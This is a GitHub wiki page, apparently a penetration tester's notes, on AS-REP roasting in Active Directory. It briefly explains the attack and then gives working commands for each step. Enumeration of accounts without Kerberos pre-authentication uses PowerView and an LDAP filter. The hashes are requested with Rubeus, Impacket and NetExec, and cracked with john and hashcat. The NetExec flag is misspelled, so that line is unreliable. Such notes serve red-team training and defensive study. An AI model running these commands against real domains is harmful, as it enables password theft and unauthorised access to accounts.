ASREP Roasting - CraigDonkin/Infrastructure GitHub Wiki

  • Can be performed against users that don't have Kerberos pre-authentication enabled.
  • You send an AS_REQ request to the KDC on behalf of one of these users and receive an AS_REP response.
    • Password can then be retrieved in a cracking attack.
  • Don't need to have a domain user account, just network access to talk to KDC/DC.
    • But you need a domain user account to enumerate accounts that are vulnerable. Otherwise you are restricted to brute forcing usernames.

Enumeration

  • PowerView:
Get-DomainUser -PreauthNotRequired -verbose
  • LDAP:
(&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))

Requesting AS_REP

Rubeus

Rubeus.exe asreproast /user:<username> /nowrap
Rubeus.exe asreproast /format:hashcat /outfile:<outputfile> /user:<username>

Impacket

GetNPUsers.py -request -format hashcat -outputfile <output file> -dc-ip <KDC IP> '<DOMAIN>/<username>'

NetExec

nxc ldap <IP> -u <username> -p <password> --asrepraost <output> --kdcHost <domain name>

Cracking

john --format=krb5asrep --wordlist=<wordlist> <hashes>
hashcat -m 18200 --force -a 0 <hashes> <wordlist>
⚠️ **GitHub.com Fallback** ⚠️